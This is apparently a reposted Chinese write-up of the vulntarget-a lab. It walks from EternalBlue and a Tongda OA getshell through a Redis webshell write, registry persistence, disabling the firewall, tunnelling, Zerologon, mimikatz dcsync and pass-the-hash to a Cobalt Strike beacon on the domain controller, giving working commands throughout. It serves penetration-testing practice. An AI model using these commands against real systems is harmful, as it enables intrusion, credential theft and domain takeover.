vulntarget-a-wp
vulntarget-a信息收集
存活扫描,目标开放了445还是win7,考虑一手永恒之蓝
arp-scan -l
nmap -A -sT -sV 192.168.130.4https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230302220649278-16016630.png
永恒之蓝
用nmap的插件验证一下确实存在
nmap -sT -sV -Pn -p445 --script=smb-vuln-ms17-010.nse 192.168.130.7https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230302220758299-520674729.png
直接msf开打拿下shell
<img alt="image-20230202225001701" loading="lazy">
可以看到还有另一个网段10.0.20.0
<img alt="image-20230202225214524" loading="lazy">
通达OA getshell
这里也回到访问80端口的web看看应该也是有突破口的,看到扫码那里显示了是通达OA
https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230302215609542-1062944430.png
上工具一把梭
https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230302215907455-236448094.png
连接上去发现直接就是system权限了
https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230302220221448-1285677394.png
域信息收集
哥斯拉中chcp 65001之后还是有乱码,先维持一下权限,再上线cs。存活扫描一下得到所在的域和另外一个99的机器win2016
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\system32\userinit.exe,C:/MYOA/webroot/shell.exe"https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230302232303993-2020166962.png
流量转发
接着进入10.0.20.0这个网段去收集99机器的信息,直接使用frp时客户端会报timeout,cs上关掉防火墙就可以连上了
netsh advfirewall set allprofile state off
netsh advfirewall show all state 因为在cs上用fscan的回显有乱码chcp 65001也没解决,这里用插件试了一下然后成功打开了3389,直接上才艺。如下开放了80和6379。这里fscan提示有redis未授权
https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230303003406558-337495329.png
redis未授权需要知道绝对路径才能写shell,先看看web有没有突破口,98上frpc,kali上frps,windows上通过proxifier搭成隧道进行访问。访问80页面却只有hello world
https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230303004937414-1274804613.png
扫一下后台目录发现了phpinfo
https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230303010037451-1465726733.png
访问发现l.php是个php探针,这里暴露了他的绝对路径 C:/phpStudy/PHPTutorial/WWW
https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230303011054535-589089734.png
Redis 未授权
得到了路径就验证一下是否真的存在未授权访问,因为这里用的wsl需要配置一下redis,稍作记录。
wget http://download.redis.io/releases/redis-2.8.17.tar.gz & tar -zxvf redis-2.8.17.tar.gz
cd src & cp redis-server /usr/bin
cp redis-cli /usr/bin
cd .. & cp redis.conf /etc/
redis-cli -h 10.0.20.99https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230303012403937-1521853538.png
但执行低三步写入shell的时候有报错 “(error) READONLY You can't write against a read only slave”。这是因为主服务器有读写权限,而 从服务器slave master 默认只具有读的权限。两种解决方法一种是修改redis.conf(将参数 slave-read-only yes 将yes修改为no)可以永久生效但需要重启服务。第二种就是通过 config set slave-read-only no 进行临时设置,立即生效,但重启后就会失效。
config set dir "C:/phpStudy/PHPTutorial/WWW"
config set dbfilename lockly.php
set x "\r\n\r\n<?php eval($_POST['bk']);?>\r\n\r\n"
config set slave-read-only nohttps://img2023.cnblogs.com/blog/3038812/202303/3038812-20230303013749033-286569757.png
哥斯拉连上去,是system权限,还发现了另外一个网段10.0.10.0
https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230303014204030-1503259907.png
执行转发上线,然后生成正向马从哥斯拉上传并执行就可以通过98机器中转上线了,上来做个权限维持先
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\system32\userinit.exe,C:/phpStudy/PHPTutorial/WWW/beacon.exe"https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230303015659740-1477607588.png
存活扫描
上传fscan扫描存活主机和端口,另一个110机器开放了88,135,139,445
https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230303213414906-607062413.png
查看域管理员
net group "enterprise admins" /domainhttps://img2023.cnblogs.com/blog/3038812/202303/3038812-20230303220625324-1593405872.png
查看域控用户
net group "domain controllers" /domainhttps://img2023.cnblogs.com/blog/3038812/202303/3038812-20230303214354521-1709878024.png
Zerologon 打域控
尝试了一下zerologon,用lodan的插件成功将域控的密码打空,但这样可能会导致主机脱域,后面需要恢复
https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230303215004592-1028778782.png
然后又远程桌面过去mimikatz导出hash,但是最后一步复原不起作用
lsadump::dcsync /domain:vulntarget.com /dc:win2019.vulntarget.com /user:administrator /authuser:win2019$ /authdomain:vulntarget.com /authpassword:"" /authntlm
lsadump::postzerologon /target:win2019.vulntarget.com /account:win2019$https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230305164927073-680529876.png
后面看了别人的wp,用了github上的exp,因为前面只有一层代理,所以现在是访问不到10.0.10.0这个网段的,本来是用frp继续配第二层代理的,但是奇怪的在关了防火墙的之后也还是访问不到主机。所以在cs上从10.0.20.99那台机子上开启转发,再修改proxychains的配置文件,注释掉之前的,添加sockt4 10.0.20.99 $port.这个port是cs上新建转发时设置的。
说回来上面的hash试了几个网站解不出来,这里当时忘了截用exp跑出来的结果,得到hash可以拿到一个交互式shell
proxychains python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 vulntarget/administrator@10.0.10.110https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230305230140673-862701155.png
根据他的help,将cs生成的正向马上传,在cs这边新建一个Beacon Tcp的监听器
lput /root/Desktop/beacon.exe C:/Windows
cd C:/Windows; start beacon.exe运行马子之后在99那台机器上 connect 10.0.10.110 $port(新建监听器设置的端口)。成功拿下域控
https://img2023.cnblogs.com/blog/3038812/202303/3038812-20230305232116772-1638128556.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]